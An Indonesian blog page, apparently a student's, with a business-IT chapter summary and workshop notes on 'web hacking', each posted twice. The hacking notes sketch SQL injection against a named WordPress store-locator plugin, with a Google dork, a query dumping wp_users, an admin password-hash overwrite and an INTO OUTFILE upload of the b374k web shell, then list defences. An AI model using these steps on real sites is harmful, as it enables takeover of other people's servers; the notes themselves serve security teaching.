Wednesday, 20 March 2013

Bersaing Dengan Menggunakan Teknologi Informasi (Chapter 2)



DASAR-DASAR KEUNGGULAN STRATEGIS
-          Konsep-konsep Dasar Strategi Kompetitif
Hal ini menciptakan sistem informasi strategis, sistem informasi yang mendukung atau membentuk posisi kompetitif dan strategi dari perusahaan bisnis. Jadi, sistem informasi strategis dapat berupa sistem informasi apapun  (TPS, SIM, DSS, dan lain-lain), yang menggunakan teknologi informasi untuk membantu organisasi memperoleh keunggulan kompetitif, mengurangi kelemahan kompetitif, atau untuk memenuhi tujuan strategis perusahaan lainnya.
-          Tekanan Kompetitif dan Strategi
Perusahaan dapat bertahan hidup dan berhasil dalam jangka panjang, hanya jika perusahaan tersebut berhasil mengembangkan strategi untuk menghadapi lime tekanan kompetitif yang membentuk struktur persaingan dalam industrinya.   
·        MENGGUNAKAN TEKNOLOGI INFORMASI SEBAGAI KEUNGGULAN STRATEGIS
-          Penggunaan Strategis Teknologi Informasi
Terdapat banyak cara perusahaan dapat memandang dan menggunakan teknologi informasi. Contohnya, perusahaan dapat memilih untuk menggunakan sistem informasi secara strategis, atau perusahaan dapat merasa puas dengan menggunakan teknologi informasi untuk mendukung operasi rutin yang efisien. Akan tetapi, jika perusahaan menekankan penggunaan strategis bisnis dari teknologi informasi, manajemen perusahaan tersebut akan memandang teknologi informasi sebagai faktor pembeda kompetitif yang utama. Pihak manajemen kemudian akan membentuk berbagai strategi bisnis yang akan menggunakan teknologi informasi untuk mengembangkan berbagai produk, jasa, dan kemampuan yang akan memberi perusahaan keunggulan besar dalam pasar tempat perusahaan bersaing.
-          Membangun Bisnis yang Berfokus pada Pelanggan
Bagi banyak perusahaan, nilai bisnis utama mereka untuk menjadi bisnis yang berfokus pada pelanggan, yang terletak pada kemampuan mereka untuk mempertahankan pelanggan agar tetap loyal, mengantisipasi kebutuhan di masa mendatang, merespons kekhawatiran pelanggan, dan menyediakan layanan pelanggan berkualitas tinggi. Fokus strategis atas nilai bagi pelanggan ini mengakui bahwa kualitas bukan harga, melainkan telah menjadi determian utama dalam persepsi pelanggan atas nilai. Dari sudut pandang pelanggan, perusahaan-perusahaan yang secara konsisten menawarkan nilai terbaik mampu menelusuri preferensi setiap pelanggannya, mengikuti tren pasar, pasokan produk, layanan dan informasi, kapan saja, di mana saja, dan memberi layanan, pelanggan yang disesuaikan dengan kebutuhan tiap pelanggan. Selain itu, teknologi internet telah menciptakan peluang strategis bagi perusahaan besar dan kecil, untuk menawarkan layanan dan produk yang cepat, responsif, serta berkualitas tinggi yang disesuaikan dengan preferensi setiap pelanggan.
-          Merekayasa Ulang Proses Bisnis
Teknologi informasi adalah bahan utama dalam merekayasa ulang proses bisnis dengan memungkinkan perubahan radikal atau proses bisnis yang secara dramatis akan meningkatkan efisiensi dan efektivitasnya. Teknologi internet dapat memainkan peranan besar dalam mendukung perubahan inovasi atas desain arus kerja,persyaratan pekerjaan, serta struktur organisasi dalam sebuah perusahaan.
·        MENJADI PERUSAHAAN YANG LINCAH
Kelincahan ( agility ) dalam kinerja bisnis adalah kemampuan perusahaan untuk sejahtera dalam pasar global yang berubah cepat dan terus terfragmen untuk produk dan jasa berkualitas tinggi, berkinerja baik, dan disesuaikan dengan pelanggan. Perusahaan yang lincah dapat membuat laba dalam pasar dengan pilihan produk yang luas dan bermasa hidup pendek, dan dapat memproduksi peranan secara individual dan dengan jumlah yang besar. Perusahaan tersebut mendukung penyesuaian massal ( mass customization ) dengan menawarkan produk individual sambil mempertahankan produksi dalam volume yang tinggi. Perusahaan yang lincah sangat bergantung pada teknologi internet untuk memadukan dan mengelola proses bisnis, sambil menyediakan daya pemrosesan informasi untuk melayani banyak pelanggan sebagai individual.  
·        MENCIPTAKAN PERUSAHAAN VIRTUAL
Membentuk perusahaan virtual telah menjadi strategi kompetitif yang penting dalam pasar global yang dinamis saat ini. Internet dan teknologi informasi lainnya memainkan peran penting dalam menyediakan sumber daya komputer serta telekomunikasi untuk mendukung arus komunikasi, koordinasi, dan informasi yang dibutuhkan. Para manajer perusahaan virtual tergantung pada teknologi informasi untuk membantu mereka mengelola jaringan sumber daya orang, pengetahuan, keuangan, dan fisik yang disediakan oleh banyak mitra bisnis untuk secara cepat memanfaatkan peluang pasar yang berubah dengan cepat.
·        MEMBANGUN PERUSAHAAN YANG DAPAT MENGHASILKAN PENGETAHUAN
Keunggulan kompetitif yang dapat bertahan lama saat ini hanya dapat berasal dari penggunaan dan manajemen yang inovatif atas pengetahuan organisasi melalui perusahaan yang dapat menghasilkan pengetahuan dan organisasi yang belajar. Teknologi internet secara luas digunakan dalam sistem manajemen pengetahuan untuk mendukung pembuatan dan penyebaran pengetahuan bisnis dan integrasinya ke dalam produk, jasa, serta proses bisnis yang baru.


Monday, 4 March 2013

Web Hacking X-Code





Oleh    : Zaenab A. Zahra
Teka-Teki Report Password
Web Hacking X-Code 2 Maret 2013
UIN Maulana Malik Ibrahim Malang




Pemahaman dasar ethical hacker
Keamanan komputer menjadi penting?
-        Perkembangan komputer
-        Ketergantungan manusia
-        Tuntutan kompleksitas semakin tinggi
-        Keamanan menjadi anak tiri
-        Kemampuan orang disebut hacker menjadi menurun
-        Kemampuan rendah bisa menjadi ancaman tinggi untuk kepentingan umum

Terminologi hacker
-        Vulnerability    : mengetahui celah keamanan
-        Threat               : bagaimana cara-cara yang harus dilakukan supaya bisa masuk
-        Attack              : prosees masuk/ membobol keamanannya
-        Exploit             : memanage apa yang harus dilakukan di dalamnya

 Contoh Situs yang menyediakan exploits
-  Metasploit Framework 
 
-   Exploit-db.com 
 
securityfocus.com
Darkc0de.com
packetstormsecurity.org   

 
Element-element keamanan (CIA)
1.    Confidentiality
            Keamanan informasi data untuk diketahui atau dibaca oleh pihak yang tidak dikehendaki
2.    Integrity / integritas
            Keamanan informasi data untuk menghindari adanya perubahan yang tidak dikehendaki
-        3.  Availability
            Keamanan informasi data untuk ketersediaan atau keberadaannya


Sebuah program harusnya berada di tengah-tengahnya.



 
Pengelompokkan hacke
  1. Black Hat Hacker
  2. White Hat Hacker
  3. Grey Hat Hacker
  4. Suicide Hacker

Tahapan aktifitas Hacking
-        Reconnaissance
1.     Reconnaissance Passive
- Pencarian data target di google
- Pencarian data target di berbagai jejaring sosial
2.     Reconnaissance Active
- HTTP Fingerprint

-        Scanning, pencarian berdasarkan scanning
- Google.com
- Archive Milw0rm
- Archive Exploit DB
- Metasploit Framework
- Darkc0de

-        Gaining Acces
- Exploitasi Remote Execution pada celah keamanan OS
- Exploitasi Remote Execution pada celah keamanan aplikasi
- Exploitasi Remote Execution pada celah keamanan web

-        Maintaining acces
PHP Backdoor
Simple php shell
R57
C99 / C100
ASP Backdoor
B374K

-        Covering Tracks
- Pembersihan berbagai exploit atau software yang diupload
- Pembersihan jejak disesuaikan dengan penggunaan aplikasi di target dan ke target.


KONSEP
SQL Injection
GET dan POST
-        GET : www.site.com/form.php?nama=zae
-        POST : www.site.com/form.php
IMPLEMENTASI pada method GET & POST
-        Langsung dari URL
-        Header : Content-Type: application/x-www-form-urlencoded
-        Data : variable=value

Query
-        $query = “SELECT * FROM contoh WHERE nama =’$username’”;
-        $username = dari GET atau POST
SQL Injection
-        $query = “SELECT namaTabel FROM contoh WHERE nama =’$username’”; DROP TABLE namaTabel; --’
-        $query = “SELECT namaTabel FROM contoh WHERE nama =‘terserah‘ OR ‘x’ = ‘x’”;
Noobs…


 
DEMO WEB HACKING
Wordpress Plugins - Google Maps via Store Locator Plus Multiple Vulnerability

Vulnerability Info
-        Description : Wordpress Plugins - Google Maps via Store Locator Plus Multiple Vulnerability
-        Version : 2.7.1 - 3.0.1
-        Date : 26-05-2012
-        Google Dork : inurl:/wp-content/plugins/store-locator-le/
-        Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
SQL Injection Vuln



POST Method, Advanced REST Client
-        Method : POST
-        Header : Content-Type: application/x-www-form-urlencoded
-        Data : query=[injection]
-        Contoh:
query=SELECT * FROM wp_users
Mengatasi Teka-Teki Hash
UPDATE – replace password
            UPDATE  wp_users SET  user_pass =  '$P$BAu2rgOUahu8hibdJ12ToW4zu6b.XB.' WHERE  `wp_users`.`ID` =1 LIMIT 1 ;
-        Mengganti password menjadi “Password”
Upload b374k via Query
SELECT ’[kode script]’ INTO OUTFILE “e:/AppServ/www/ict2013/exploit.php”
http://localhost/ict2013/wp-content/plugins/store-locator-le/core/load_wp_config.php
+ diganti %2B
Base 64 Encryption
Base64 adalah istilah umum untuk sejumlah skema pengkodean serupa yang mengkodekan data biner dan menerjemahkannya ke dalam representasi basis 64. Istilah Base64 berasal dari konten pengkodean MIME tertentu. (Wikipedia, 2010)



PENGAMANAN
-        Update CMS, plugin
-        Menggunakan mysql_real_escape_string()
-        Memberikan validasi pada tiap inputan
-        Berikan length limit pada inputan
-        Config database error report
-        Setting php.ini
-        dll 








Wednesday, 20 March 2013

Bersaing Dengan Menggunakan Teknologi Informasi (Chapter 2)

Posted by Unknown at 18:12 0 comments


DASAR-DASAR KEUNGGULAN STRATEGIS
-          Konsep-konsep Dasar Strategi Kompetitif
Hal ini menciptakan sistem informasi strategis, sistem informasi yang mendukung atau membentuk posisi kompetitif dan strategi dari perusahaan bisnis. Jadi, sistem informasi strategis dapat berupa sistem informasi apapun  (TPS, SIM, DSS, dan lain-lain), yang menggunakan teknologi informasi untuk membantu organisasi memperoleh keunggulan kompetitif, mengurangi kelemahan kompetitif, atau untuk memenuhi tujuan strategis perusahaan lainnya.
-          Tekanan Kompetitif dan Strategi
Perusahaan dapat bertahan hidup dan berhasil dalam jangka panjang, hanya jika perusahaan tersebut berhasil mengembangkan strategi untuk menghadapi lime tekanan kompetitif yang membentuk struktur persaingan dalam industrinya.   
·        MENGGUNAKAN TEKNOLOGI INFORMASI SEBAGAI KEUNGGULAN STRATEGIS
-          Penggunaan Strategis Teknologi Informasi
Terdapat banyak cara perusahaan dapat memandang dan menggunakan teknologi informasi. Contohnya, perusahaan dapat memilih untuk menggunakan sistem informasi secara strategis, atau perusahaan dapat merasa puas dengan menggunakan teknologi informasi untuk mendukung operasi rutin yang efisien. Akan tetapi, jika perusahaan menekankan penggunaan strategis bisnis dari teknologi informasi, manajemen perusahaan tersebut akan memandang teknologi informasi sebagai faktor pembeda kompetitif yang utama. Pihak manajemen kemudian akan membentuk berbagai strategi bisnis yang akan menggunakan teknologi informasi untuk mengembangkan berbagai produk, jasa, dan kemampuan yang akan memberi perusahaan keunggulan besar dalam pasar tempat perusahaan bersaing.
-          Membangun Bisnis yang Berfokus pada Pelanggan
Bagi banyak perusahaan, nilai bisnis utama mereka untuk menjadi bisnis yang berfokus pada pelanggan, yang terletak pada kemampuan mereka untuk mempertahankan pelanggan agar tetap loyal, mengantisipasi kebutuhan di masa mendatang, merespons kekhawatiran pelanggan, dan menyediakan layanan pelanggan berkualitas tinggi. Fokus strategis atas nilai bagi pelanggan ini mengakui bahwa kualitas bukan harga, melainkan telah menjadi determian utama dalam persepsi pelanggan atas nilai. Dari sudut pandang pelanggan, perusahaan-perusahaan yang secara konsisten menawarkan nilai terbaik mampu menelusuri preferensi setiap pelanggannya, mengikuti tren pasar, pasokan produk, layanan dan informasi, kapan saja, di mana saja, dan memberi layanan, pelanggan yang disesuaikan dengan kebutuhan tiap pelanggan. Selain itu, teknologi internet telah menciptakan peluang strategis bagi perusahaan besar dan kecil, untuk menawarkan layanan dan produk yang cepat, responsif, serta berkualitas tinggi yang disesuaikan dengan preferensi setiap pelanggan.
-          Merekayasa Ulang Proses Bisnis
Teknologi informasi adalah bahan utama dalam merekayasa ulang proses bisnis dengan memungkinkan perubahan radikal atau proses bisnis yang secara dramatis akan meningkatkan efisiensi dan efektivitasnya. Teknologi internet dapat memainkan peranan besar dalam mendukung perubahan inovasi atas desain arus kerja,persyaratan pekerjaan, serta struktur organisasi dalam sebuah perusahaan.
·        MENJADI PERUSAHAAN YANG LINCAH
Kelincahan ( agility ) dalam kinerja bisnis adalah kemampuan perusahaan untuk sejahtera dalam pasar global yang berubah cepat dan terus terfragmen untuk produk dan jasa berkualitas tinggi, berkinerja baik, dan disesuaikan dengan pelanggan. Perusahaan yang lincah dapat membuat laba dalam pasar dengan pilihan produk yang luas dan bermasa hidup pendek, dan dapat memproduksi peranan secara individual dan dengan jumlah yang besar. Perusahaan tersebut mendukung penyesuaian massal ( mass customization ) dengan menawarkan produk individual sambil mempertahankan produksi dalam volume yang tinggi. Perusahaan yang lincah sangat bergantung pada teknologi internet untuk memadukan dan mengelola proses bisnis, sambil menyediakan daya pemrosesan informasi untuk melayani banyak pelanggan sebagai individual.  
·        MENCIPTAKAN PERUSAHAAN VIRTUAL
Membentuk perusahaan virtual telah menjadi strategi kompetitif yang penting dalam pasar global yang dinamis saat ini. Internet dan teknologi informasi lainnya memainkan peran penting dalam menyediakan sumber daya komputer serta telekomunikasi untuk mendukung arus komunikasi, koordinasi, dan informasi yang dibutuhkan. Para manajer perusahaan virtual tergantung pada teknologi informasi untuk membantu mereka mengelola jaringan sumber daya orang, pengetahuan, keuangan, dan fisik yang disediakan oleh banyak mitra bisnis untuk secara cepat memanfaatkan peluang pasar yang berubah dengan cepat.
·        MEMBANGUN PERUSAHAAN YANG DAPAT MENGHASILKAN PENGETAHUAN
Keunggulan kompetitif yang dapat bertahan lama saat ini hanya dapat berasal dari penggunaan dan manajemen yang inovatif atas pengetahuan organisasi melalui perusahaan yang dapat menghasilkan pengetahuan dan organisasi yang belajar. Teknologi internet secara luas digunakan dalam sistem manajemen pengetahuan untuk mendukung pembuatan dan penyebaran pengetahuan bisnis dan integrasinya ke dalam produk, jasa, serta proses bisnis yang baru.


Monday, 4 March 2013

Web Hacking X-Code

Posted by Unknown at 20:49 0 comments




Oleh    : Zaenab A. Zahra
Teka-Teki Report Password
Web Hacking X-Code 2 Maret 2013
UIN Maulana Malik Ibrahim Malang




Pemahaman dasar ethical hacker
Keamanan komputer menjadi penting?
-        Perkembangan komputer
-        Ketergantungan manusia
-        Tuntutan kompleksitas semakin tinggi
-        Keamanan menjadi anak tiri
-        Kemampuan orang disebut hacker menjadi menurun
-        Kemampuan rendah bisa menjadi ancaman tinggi untuk kepentingan umum

Terminologi hacker
-        Vulnerability    : mengetahui celah keamanan
-        Threat               : bagaimana cara-cara yang harus dilakukan supaya bisa masuk
-        Attack              : prosees masuk/ membobol keamanannya
-        Exploit             : memanage apa yang harus dilakukan di dalamnya

 Contoh Situs yang menyediakan exploits
-  Metasploit Framework 
 
-   Exploit-db.com 
 
securityfocus.com
Darkc0de.com
packetstormsecurity.org   

 
Element-element keamanan (CIA)
1.    Confidentiality
            Keamanan informasi data untuk diketahui atau dibaca oleh pihak yang tidak dikehendaki
2.    Integrity / integritas
            Keamanan informasi data untuk menghindari adanya perubahan yang tidak dikehendaki
-        3.  Availability
            Keamanan informasi data untuk ketersediaan atau keberadaannya


Sebuah program harusnya berada di tengah-tengahnya.



 
Pengelompokkan hacke
  1. Black Hat Hacker
  2. White Hat Hacker
  3. Grey Hat Hacker
  4. Suicide Hacker

Tahapan aktifitas Hacking
-        Reconnaissance
1.     Reconnaissance Passive
- Pencarian data target di google
- Pencarian data target di berbagai jejaring sosial
2.     Reconnaissance Active
- HTTP Fingerprint

-        Scanning, pencarian berdasarkan scanning
- Google.com
- Archive Milw0rm
- Archive Exploit DB
- Metasploit Framework
- Darkc0de

-        Gaining Acces
- Exploitasi Remote Execution pada celah keamanan OS
- Exploitasi Remote Execution pada celah keamanan aplikasi
- Exploitasi Remote Execution pada celah keamanan web

-        Maintaining acces
PHP Backdoor
Simple php shell
R57
C99 / C100
ASP Backdoor
B374K

-        Covering Tracks
- Pembersihan berbagai exploit atau software yang diupload
- Pembersihan jejak disesuaikan dengan penggunaan aplikasi di target dan ke target.


KONSEP
SQL Injection
GET dan POST
-        GET : www.site.com/form.php?nama=zae
-        POST : www.site.com/form.php
IMPLEMENTASI pada method GET & POST
-        Langsung dari URL
-        Header : Content-Type: application/x-www-form-urlencoded
-        Data : variable=value

Query
-        $query = “SELECT * FROM contoh WHERE nama =’$username’”;
-        $username = dari GET atau POST
SQL Injection
-        $query = “SELECT namaTabel FROM contoh WHERE nama =’$username’”; DROP TABLE namaTabel; --’
-        $query = “SELECT namaTabel FROM contoh WHERE nama =‘terserah‘ OR ‘x’ = ‘x’”;
Noobs…


 
DEMO WEB HACKING
Wordpress Plugins - Google Maps via Store Locator Plus Multiple Vulnerability

Vulnerability Info
-        Description : Wordpress Plugins - Google Maps via Store Locator Plus Multiple Vulnerability
-        Version : 2.7.1 - 3.0.1
-        Date : 26-05-2012
-        Google Dork : inurl:/wp-content/plugins/store-locator-le/
-        Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
SQL Injection Vuln



POST Method, Advanced REST Client
-        Method : POST
-        Header : Content-Type: application/x-www-form-urlencoded
-        Data : query=[injection]
-        Contoh:
query=SELECT * FROM wp_users
Mengatasi Teka-Teki Hash
UPDATE – replace password
            UPDATE  wp_users SET  user_pass =  '$P$BAu2rgOUahu8hibdJ12ToW4zu6b.XB.' WHERE  `wp_users`.`ID` =1 LIMIT 1 ;
-        Mengganti password menjadi “Password”
Upload b374k via Query
SELECT ’[kode script]’ INTO OUTFILE “e:/AppServ/www/ict2013/exploit.php”
http://localhost/ict2013/wp-content/plugins/store-locator-le/core/load_wp_config.php
+ diganti %2B
Base 64 Encryption
Base64 adalah istilah umum untuk sejumlah skema pengkodean serupa yang mengkodekan data biner dan menerjemahkannya ke dalam representasi basis 64. Istilah Base64 berasal dari konten pengkodean MIME tertentu. (Wikipedia, 2010)



PENGAMANAN
-        Update CMS, plugin
-        Menggunakan mysql_real_escape_string()
-        Memberikan validasi pada tiap inputan
-        Berikan length limit pada inputan
-        Config database error report
-        Setting php.ini
-        dll 








 

Catatanku Template by Ipietoon Cute Blog Design